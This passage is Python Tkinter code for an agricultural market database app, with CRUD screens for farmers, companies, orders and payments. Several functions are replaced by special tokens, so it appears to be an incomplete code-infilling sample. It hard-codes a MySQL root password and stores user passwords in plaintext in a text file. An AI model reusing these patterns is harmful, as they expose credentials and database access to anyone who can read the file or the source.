    """Populate a Treeview with every row of the orders table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    hbar = Scrollbar(container, orient=HORIZONTAL)
    vbar = Scrollbar(container, orient=VERTICAL)
    headings = {'or_id': 'Order Id', 'or_date': 'Order Date', 'or_fid':
        'Ordered Farmer Id', 'or_formula': 'Order (item)formula', 'or_to':
        'Order to'}
    tree = ttk.Treeview(container, columns=tuple(headings),
        xscrollcommand=hbar.set, yscrollcommand=vbar.set)
    hbar.pack(side=BOTTOM, fill=X)
    vbar.pack(side=RIGHT, fill=Y)
    hbar.config(command=tree.xview)
    vbar.config(command=tree.yview)
    for column, caption in headings.items():
        tree.heading(column, text=caption)
    tree['show'] = 'headings'
    tree.pack()
    cur.execute('SELECT * FROM orders;')
    rows = cur.fetchall()
    db.commit()
    for record in rows:
        tree.insert('', END, values=record)
<|reserved_special_token_0|>
def insert_ord():
    """Blank form for adding an order (date pre-filled with now); Commit runs insert_ord_command."""
    global e1, e2, e3, e4, e5, e6
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    captions = ['Order Id', 'Order date', 'Order FID', 'Order formula',
        'Order to']
    row_ys = [10, 60, 110, 160, 210]
    for caption, y in zip(captions, row_ys):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    e1, e2, e3, e4, e5 = (Entry(root, width=50) for _ in range(5))
    for entry, y in zip((e1, e2, e3, e4, e5), row_ys):
        entry.place(x=350, y=y)
    # Pre-fill the order date with the current timestamp.
    e2.insert(0, datetime.now())
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=insert_ord_command)
    commit_btn.place(x=400, y=400)
def insert_ord_command():
    """Insert the order form values; re-show the form on any failure."""
    try:
        sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # execute, not executemany: a single parameter row.
        cur.execute(sql, vals)
        db.commit()
        orders()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_ord()
def delete_ord():
    """Prompt for an order id to delete; Commit runs delete_ord_command."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Order Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=delete_ord_command)
    commit_btn.place(x=400, y=400)
def delete_ord_command():
    """Delete the order whose id is typed in e1; show an error label on failure."""
    try:
        sql = 'DELETE FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        db.commit()
        orders()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Entry', font=('times new roman', 15))
        l.place(x=100, y=300)
<|reserved_special_token_0|>
def update_or():
    """Load the order row matching the id typed in e1 into editable fields
    so it can be modified via update_command_ord."""
    try:
        global e1, e2, e3, e4, e5, e6
        label = Label(root, text=' ' * 800, font=('Times new roman', 500),
            bg='tomato')
        label.place(x=0, y=0)
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        captions = ['Order Id', 'Order Date', 'Order f_id', 'Order formula',
            'Order to']
        row_ys = [10, 60, 110, 160, 210]
        for caption, y in zip(captions, row_ys):
            lbl = Label(root, text=caption, font=('Times new roman', 20),
                bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3, e4, e5 = (Entry(root) for _ in range(5))
        # Bug fix: the original built `[e1, ..., e5, e6]` with the stale
        # global e6, risking a NameError that the bare except then hid.
        entries = [e1, e2, e3, e4, e5]
        data = cur.fetchall()
        for entry, value in zip(entries, data[0]):
            entry.insert(0, value)
        for entry, y in zip(entries, row_ys):
            entry.place(x=350, y=y)
        modify_btn = Button(root, text='Modify', font=('Times new roman', 20),
            bg='blue', command=update_command_ord)
        modify_btn.place(x=300, y=400)
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid Order_id', font=('times new roman', 15))
        l.place(x=100, y=300)
        update_ord()
def update_command_ord():
    """Write the edited order fields (e2..e5) back for the order id in e1."""
    sql = (
        'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'
        )
    vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()
    # execute, not executemany: there is exactly one parameter row.
    cur.execute(sql, vals)
    db.commit()
    orders()
def search_ord():
    """Prompt for an order id; Search runs search_or, Back returns to the orders screen."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Order Id:', font=('Times new roman', 20),
        bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=orders)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_or)
    search_btn.place(x=400, y=400)
def search_or():
    """Look up the order id typed in e1 and display each column as a label."""
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    try:
        sql = 'SELECT * FROM orders WHERE or_id=%s;'
        cur.execute(sql, [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=orders)
        ok_btn.place(x=300, y=400)
        names = ['order Id: ', 'Order date: ', 'Order fid: ',
            'Order formula: ', 'order to: ']
        for val in cur:
            for offset, (caption, field) in enumerate(zip(names, val)):
                label = Label(root, text=caption + str(field), font=(
                    'Times new roman', 20), bg='tomato')
                label.place(x=10, y=50 + 50 * offset)
        db.commit()
    except Exception:
        # Narrowed from a bare `except:`.
        l = Label(root, text='Invalid order id', font=('times new roman', 15))
        l.place(x=100, y=300)
        search_ord()
def payment():
    """Payment screen: toolbar (Back/Insert/Delete/Update/Search) plus the table view."""
    global root
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    heading = Label(root, text='Payment Table', font=('Times new roman', 15),
        bg='white')
    heading.place(x=350, y=10)
    actions = [('Back', entity_page), ('Insert', insert_pay), ('Delete',
        delete_pay), ('Update', update_pay), ('Search', search_pay)]
    for slot, (caption, callback) in enumerate(actions):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * slot, y=50)
    view_pay()
def view_pay():
    """Populate a Treeview with every row of the payment table."""
    container = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    container.place(x=10, y=100, width=750, height=400)
    hbar = Scrollbar(container, orient=HORIZONTAL)
    vbar = Scrollbar(container, orient=VERTICAL)
    headings = {'trans_id': 'Transaction Id', 'p_f_id': 'Farmer Id',
        'p_date': 'Payment Date', 'p_amount': 'Amount', 'p_method':
        'Payment Method'}
    tree = ttk.Treeview(container, columns=tuple(headings),
        xscrollcommand=hbar.set, yscrollcommand=vbar.set)
    hbar.pack(side=BOTTOM, fill=X)
    vbar.pack(side=RIGHT, fill=Y)
    hbar.config(command=tree.xview)
    vbar.config(command=tree.yview)
    for column, caption in headings.items():
        tree.heading(column, text=caption)
    tree['show'] = 'headings'
    tree.pack()
    cur.execute('SELECT * FROM payment;')
    rows = cur.fetchall()
    db.commit()
    for record in rows:
        tree.insert('', END, values=record)
<|reserved_special_token_0|>
def insert_pay():
    """Payment entry form; Commit runs insert_pay_command.

    e1..e4 are Entry widgets; e5 is a StringVar backing the payment-method
    OptionMenu (insert_pay_command reads it through the same .get() interface).
    """
    global e1, e2, e3, e4, e5, e6
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'tomato')
    label.place(x=0, y=0)
    captions = ['Transaction Id', 'Transaction farmer id',
        'Transaction date', 'Transaction amount', 'Transaction method']
    for y, caption in zip([10, 60, 110, 160, 210], captions):
        lbl = Label(root, text=caption, font=('Times new roman', 20),
            bg='white')
        lbl.place(x=50, y=y)
    # Bug fix: the original also created an Entry for e5 that was never
    # placed and was immediately overwritten by the StringVar below.
    e1 = Entry(root, width=50)
    e2 = Entry(root, width=50)
    e3 = Entry(root, width=50)
    e4 = Entry(root, width=50)
    e1.place(x=350, y=10)
    e2.place(x=350, y=60)
    e3.place(x=350, y=110)
    # Pre-fill the payment date with the current timestamp.
    e3.insert(0, datetime.now())
    e4.place(x=350, y=160)
    e5 = StringVar(root)
    e5.set('Debit card')
    # NOTE(review): the default 'Debit card' is not one of the menu choices,
    # so it cannot be re-selected once changed — confirm the intended options.
    w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')
    w.place(x=350, y=210)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15), command=
        insert_pay_command)
    commit_btn.place(x=400, y=400)
def insert_pay_command():
    """Insert the payment form values; re-show the form on any failure."""
    try:
        sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'
        vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()
        # execute, not executemany: a single parameter row.
        cur.execute(sql, vals)
        db.commit()
        payment()
    except Exception:
        # Narrowed from a bare `except:`.
        insert_pay()
def delete_pay():
    """Prompt for a transaction id to delete; Commit runs delete_pay_command."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Transaction Id:', font=('Times new roman',
        20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
        command=delete_pay_command)
    commit_btn.place(x=400, y=400)
<|reserved_special_token_0|>
def search_pay():
    """Prompt for a transaction id; Search runs search_pa, Back returns to the payment screen."""
    global e1
    blanket = Label(root, text=' ' * 800, font=('Times new roman', 500),
        bg='tomato')
    blanket.place(x=0, y=0)
    prompt = Label(root, text='Transaction Id:', font=('Times new roman',
        20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=payment)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_pa)
    search_btn.place(x=400, y=400)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def First_page(root):
    """Render the login screen: title, username/password fields, LogIn and Register buttons."""
    global T1, T2, T3
    Frame(root, height=500, width=800, bg='ivory').pack()
    title = Label(root, text='WELCOME TO AGRI MARKET', font=(
        'Times new roman', 25))
    title.place(x=200, y=50)
    login_btn = Button(root, text='LogIn', font=('times new roman', 20),
        command=check_pass, bg='green')
    login_btn.place(x=350, y=350)
    user_lbl = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    user_lbl.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=280, y=200)
    pass_lbl = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    pass_lbl.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=280, y=250)
    register_btn = Button(root, text='Register', font=('Arial Bold', 15),
        bg='blue', command=create_pass)
    register_btn.place(x=340, y=400)
def check_pass():
    """Validate the login form against password.txt (one 'user=pass' per line)."""
    global root, T1, T2, T3

    def _show_failure():
        # Shared error label for every rejection path.
        label = Label(root, text='Invalid username or password.Try again',
            font=('times new roman', 15))
        label.place(x=200, y=100)
    try:
        with open('password.txt', 'r') as f:
            stored = f.read().splitlines()
    except OSError:
        # Narrowed from a bare `except:` — no password file means no users yet.
        _show_failure()
        return
    credential = T1.get() + '=' + T2.get()
    # Bug fix: exact line match. The original substring test accepted
    # partial passwords (e.g. stored 'bob=secret' matched input 'bob=sec').
    if T1.get() != '' and T2.get() != '' and credential in stored:
        entity_page()
    else:
        _show_failure()
def create_pass():
    """Registration form: username, password and confirmation; Done -> add_pass."""
    global root, T1, T2, T3
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='ivory')
    backdrop.place(x=0, y=0)
    user_lbl = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    user_lbl.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=380, y=200)
    pass_lbl = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    pass_lbl.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=380, y=250)
    confirm_lbl = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15), bg='ivory')
    confirm_lbl.place(x=150, y=300)
    T3 = tk.Entry(root, width=30, show='*', bd=5)
    T3.place(x=380, y=300)
    done_btn = Button(root, text='Done', font=('Arial Bold', 15), bg='blue', command=add_pass)
    done_btn.place(x=440, y=400)
def add_pass():
    """Register a new credential.

    Requires the two password fields (T2, T3) to match, then appends
    ``user=password`` as a new line of password.txt and opens the main menu.
    """
    global root, T1, T2, T3
    if T2.get() != T3.get():
        label = Label(root, text='Incorrect Password. Enter again', font=(
            'times new roman', 20))
        label.place(x=100, y=100)
    else:
        try:
            # Read the existing file, then rewrite it with a newline and the
            # new credential appended.
            with open('password.txt', 'r') as f:
                data = f.read()
            with open('password.txt', 'w') as f:
                f.write(data + '\n')
                f.write(T1.get() + '=' + T2.get())
            entity_page()
        except:
            # First run (no password.txt yet): create it with this credential.
            with open('password.txt', 'w') as f:
                f.write(T1.get() + '=' + T2.get())
            entity_page()
def entity_page():
    """Main menu: clear the screen and show one navigation button per table."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='ivory')
    backdrop.place(x=0, y=0)
    title = Label(root, text='WELCOME TO AGRI MARKET ', font=('Times new roman', 20), bg='blue')
    title.place(x=200, y=20)
    subtitle = Label(root, text='Choose the Entity ', font=('Times new roman', 20), bg='white')
    subtitle.place(x=250, y=100)
    # (caption, callback, x, y) for each navigation button.
    actions = [
        ('Farmers', farmer, 100, 175),
        ('Company', company, 300, 175),
        ('Fertilizer', fertilizer, 500, 175),
        ('Order', orders, 200, 325),
        ('Payment', payment, 400, 325),
        ('GET BOOKING HISTORY', history, 200, 425),
    ]
    for caption, callback, x, y in actions:
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=x, y=y)
def history():
    """Show this month's payment transactions via the getMonth stored procedure.

    Bug fix: the original ended with ``db.close()``, closing the module-wide
    connection so every later screen's query failed for the rest of the
    session.  The shared connection now stays open.
    """
    global root, cur, db
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    # getMonth expects the current month number as text, e.g. '07'.
    cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])
    data = cur.fetchall()
    title = Label(root, text='The Transaction History of this month', font=('Arial', 15))
    title.place(x=200, y=20)
    back = Button(root, text='BACK', command=entity_page)
    back.place(x=20, y=20)
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame,
                         columns=('trans_id', 'p_f_id', 'p_date', 'p_amount', 'p_method'),
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'trans_id': 'Transaction Id', 'p_f_id': 'Farmer Id',
                'p_date': 'Payment Date', 'p_amount': 'Amount',
                'p_method': 'Payment Method'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.pack()
    for row in data:
        table.insert('', END, values=row)
# Module-wide MySQL connection and cursor shared by every screen in this file.
# Credentials are hard-coded for local use.
db = mysql.connector.connect(host='localhost', user='root', passwd=
    'bhushi', database='farmer_app')
cur = db.cursor()
def farmer():
    """Farmer screen: CRUD toolbar plus the farmer table view."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    title = Label(root, text='Farmer Table', font=('Times new roman', 15), bg='white')
    title.place(x=350, y=10)
    toolbar = [('Back', entity_page), ('Insert', insert_farmer),
               ('Delete', delete_farmer), ('Update', update_farmer),
               ('Search', search_farmer)]
    # Buttons sit in a row at y=50, 100px apart starting at x=10.
    for offset, (caption, callback) in enumerate(toolbar):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * offset, y=50)
    view_farmer()
def view_farmer():
    """Render every farmer row in a scrollable Treeview inside a bordered frame."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    columns = ('f_id', 'f_name', 'f_phone', 'f_mail', 'f_locality', 'f_address')
    table = ttk.Treeview(frame, columns=columns,
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'f_id': 'Farmer Id', 'f_name': 'Farmer Name',
                'f_phone': 'Farmer Phone', 'f_mail': 'Farmer Mail',
                'f_locality': 'Farmer Locality', 'f_address': 'Farmer Address'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.column('f_id', width=100)
    table.pack()
    cur.execute('SELECT * FROM farmer;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        table.insert('', END, values=row)
<|reserved_special_token_0|>
def insert_farmer():
    """Blank six-field form for a new farmer row; Commit -> insert_farmer_command."""
    global e1, e2, e3, e4, e5, e6
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    captions = ['Farmer_id', 'Farmer_name', 'Farmer_phone', 'Farmer_mail',
                'Farmer_locality', 'Farmer_address']
    rows_y = [10, 60, 110, 160, 210, 270]
    for caption, y in zip(captions, rows_y):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    # Entries are globals so insert_farmer_command can read them back.
    e1, e2, e3, e4, e5, e6 = (Entry(root, width=50) for _ in range(6))
    for field, y in zip((e1, e2, e3, e4, e5, e6), rows_y):
        field.place(x=350, y=y)
    back = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    back.place(x=200, y=400)
    commit = tk.Button(root, text='Commit', font=('Arial', 15), command=insert_farmer_command)
    commit.place(x=400, y=400)
<|reserved_special_token_0|>
def invalid(page):
    """Error screen for a rejected id on an insert form.

    Known pages are 'farmer' and 'company'; any other value just clears
    the screen, matching the original behavior.
    """
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    retry_targets = {'farmer': ('Enter valid farmer_id', insert_farmer),
                     'company': ('Enter valid company_id', insert_company)}
    if page in retry_targets:
        message, retry = retry_targets[page]
        lbl = Label(root, text=message, font=('Times new roman', 30), bg='white')
        lbl.place(x=170, y=200)
        btn = Button(root, text='Re-enter', font=('Times new roman', 20), command=retry)
        btn.place(x=300, y=400)
<|reserved_special_token_0|>
def delete_farmer_command():
    """Delete the farmer whose id is in e1; show an error label on failure."""
    try:
        cur.execute('DELETE FROM farmer WHERE f_id=%s;', [e1.get()])
        db.commit()
        farmer()
    except:
        err = Label(root, text='Invalid Entry', font=('times new roman', 15))
        err.place(x=100, y=300)
def update_farmer():
    """Ask for the farmer id to edit, then hand off to update()."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=update)
    ok_btn.place(x=300, y=400)
def update():
    """Load the selected farmer row into editable fields; re-prompt on a bad id."""
    try:
        global e1, e2, e3, e4, e5, e6
        backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
        backdrop.place(x=0, y=0)
        # e1 still holds the id typed on the update_farmer prompt screen.
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;', [e1.get()])
        captions = ['Farmer_id', 'Farmer_name', 'Farmer_phone', 'Farmer_mail',
                    'Farmer_locality', 'Farmer_address']
        rows_y = [10, 60, 110, 160, 210, 270]
        for caption, y in zip(captions, rows_y):
            lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3, e4, e5, e6 = (Entry(root) for _ in range(6))
        fields = [e1, e2, e3, e4, e5, e6]
        # IndexError (-> except branch) when the id matched no row.
        row = cur.fetchall()[0]
        for field, value in zip(fields, row):
            field.insert(0, value)
        for field, y in zip(fields, rows_y):
            field.place(x=350, y=y)
        modify = Button(root, text='Modify', font=('Times new roman', 20),
                        bg='blue', command=update_command)
        modify.place(x=300, y=400)
    except:
        err = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))
        err.place(x=100, y=300)
        update_farmer()
def update_command():
    """Persist the edited farmer row (entries e1..e6) back to the farmer table.

    Improvement: uses ``execute`` with one parameter tuple; the original wrapped
    a single row in ``executemany``, which is meant for batches.
    """
    try:
        sql = (
            'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'
            )
        vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()
        cur.execute(sql, vals)
        db.commit()
        farmer()
    except:
        # DB error or bad input: return to the id prompt.
        update_farmer()
def search_farmer():
    """Prompt for a farmer id with Back/Search actions."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search)
    search_btn.place(x=400, y=400)
def search():
    """Look up one farmer by id and print each column as a labelled line."""
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM farmer WHERE f_id=%s;', [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)
        ok_btn.place(x=300, y=400)
        names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',
                 'farmer mail: ', 'farmer locality: ', 'farmer address: ']
        for record in cur:
            # One label per column, stacked 50px apart from y=50.
            for offset, (caption, value) in enumerate(zip(names, record)):
                line = Label(root, text=caption + str(value),
                             font=('Times new roman', 20), bg='tomato')
                line.place(x=10, y=50 + 50 * offset)
        db.commit()
    except:
        err = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))
        err.place(x=100, y=300)
        search_farmer()
def company():
    """Company screen: CRUD toolbar plus the company table view."""
    global root
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    title = Label(root, text='Company Table', font=('Times new roman', 15), bg='white')
    title.place(x=350, y=10)
    toolbar = [('Back', entity_page), ('Insert', insert_company),
               ('Delete', delete_company), ('Update', update_company),
               ('Search', search_company)]
    for offset, (caption, callback) in enumerate(toolbar):
        btn = tk.Button(root, text=caption, font=('Arial', 15), command=callback)
        btn.place(x=10 + 100 * offset, y=50)
    view_company()
def view_company():
    """Render every company row in a scrollable Treeview inside a bordered frame."""
    frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')
    frame.place(x=10, y=100, width=750, height=400)
    x_scroll = Scrollbar(frame, orient=HORIZONTAL)
    y_scroll = Scrollbar(frame, orient=VERTICAL)
    table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),
                         xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)
    x_scroll.pack(side=BOTTOM, fill=X)
    y_scroll.pack(side=RIGHT, fill=Y)
    x_scroll.config(command=table.xview)
    y_scroll.config(command=table.yview)
    headings = {'c_id': 'Company Id', 'c_name': 'Company Name',
                'c_address': 'Company Address'}
    for column, caption in headings.items():
        table.heading(column, text=caption)
    table['show'] = 'headings'
    table.column('c_id', width=100)
    table.pack()
    cur.execute('SELECT * FROM company;')
    rows = cur.fetchall()
    db.commit()
    for row in rows:
        table.insert('', END, values=row)
def insert_company():
    """Blank three-field form for a new company row; Commit -> insert_company_command."""
    global e1, e2, e3, e4, e5, e6
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    captions = ['Company_id', 'Company_name', 'Company_address']
    rows_y = [10, 110, 210]
    for caption, y in zip(captions, rows_y):
        lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
        lbl.place(x=50, y=y)
    e1, e2, e3 = (Entry(root, width=50) for _ in range(3))
    for field, y in zip((e1, e2, e3), rows_y):
        field.place(x=350, y=y)
    back = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back.place(x=200, y=400)
    commit = tk.Button(root, text='Commit', font=('Arial', 15), command=insert_company_command)
    commit.place(x=400, y=400)
def insert_company_command():
    """Validate and insert the company form; ids longer than 3 chars are rejected."""
    try:
        if len(e1.get()) > 3:
            invalid('company')
        else:
            values = e1.get(), e2.get(), e3.get()
            cur.executemany('INSERT INTO company values(%s,%s,%s);', [values])
            db.commit()
            company()
    except:
        # Any DB error: show the blank form again.
        insert_company()
def delete_company():
    """Prompt for a company id with Back/Commit actions for deletion."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Company Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back_btn.place(x=200, y=400)
    commit_btn = tk.Button(root, text='Commit', font=('Arial', 15),
                           command=delete_company_command)
    commit_btn.place(x=400, y=400)
def delete_company_command():
    """Delete the company whose id is in e1; show an error label on failure."""
    try:
        # int() rejects non-numeric ids before they reach the DB.
        cur.execute('DELETE FROM company WHERE c_id=%s;', [int(e1.get())])
        db.commit()
        company()
    except:
        err = Label(root, text='Invalid Entry', font=('times new roman', 15))
        err.place(x=100, y=300)
<|reserved_special_token_0|>
def update_c():
    """Load the selected company row into editable fields; re-prompt on a bad id.

    Bug fix: the failure message used to read 'Invalid Farmer_id' (copy-paste
    from the farmer screen); it now names the company id.
    """
    try:
        global e1, e2, e3, e4, e5, e6
        backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
        backdrop.place(x=0, y=0)
        cur.execute('SELECT * FROM company WHERE c_id=%s;', [e1.get()])
        captions = ['Company_id', 'Company_name', 'Company_address']
        rows_y = [10, 110, 210]
        for caption, y in zip(captions, rows_y):
            lbl = Label(root, text=caption, font=('Times new roman', 20), bg='white')
            lbl.place(x=50, y=y)
        e1, e2, e3 = Entry(root), Entry(root), Entry(root)
        fields = [e1, e2, e3]
        # IndexError (-> except branch) when the id matched no row.
        row = cur.fetchall()[0]
        for field, value in zip(fields, row):
            field.insert(0, value)
        for field, y in zip(fields, rows_y):
            field.place(x=350, y=y)
        modify = Button(root, text='Modify', font=('Times new roman', 20),
                        bg='blue', command=update_command_c)
        modify.place(x=300, y=400)
    except:
        err = Label(root, text='Invalid Company_id', font=('times new roman', 15))
        err.place(x=100, y=300)
        update_company()
<|reserved_special_token_0|>
def search_company():
    """Prompt for a company id with Back/Search actions."""
    global e1
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    prompt = Label(root, text='Company Id:', font=('Times new roman', 20), bg='tomato')
    prompt.place(x=100, y=200)
    e1 = Entry(root, width=50)
    e1.place(x=300, y=200)
    back_btn = tk.Button(root, text='Back', font=('Arial', 15), command=company)
    back_btn.place(x=200, y=400)
    search_btn = tk.Button(root, text='Search', font=('Arial', 15), command=search_c)
    search_btn.place(x=400, y=400)
def search_c():
    """Look up one company by id and print each column as a labelled line."""
    backdrop = Label(root, text=' ' * 800, font=('Times new roman', 500), bg='tomato')
    backdrop.place(x=0, y=0)
    try:
        cur.execute('SELECT * FROM company WHERE c_id=%s;', [e1.get()])
        ok_btn = tk.Button(root, text='OK', font=('Arial', 15), command=company)
        ok_btn.place(x=300, y=400)
        names = ['company id: ', 'company name: ', 'company address: ']
        for record in cur:
            for offset, (caption, value) in enumerate(zip(names, record)):
                line = Label(root, text=caption + str(value),
                             font=('Times new roman', 20), bg='tomato')
                line.place(x=10, y=50 + 50 * offset)
        db.commit()
    except:
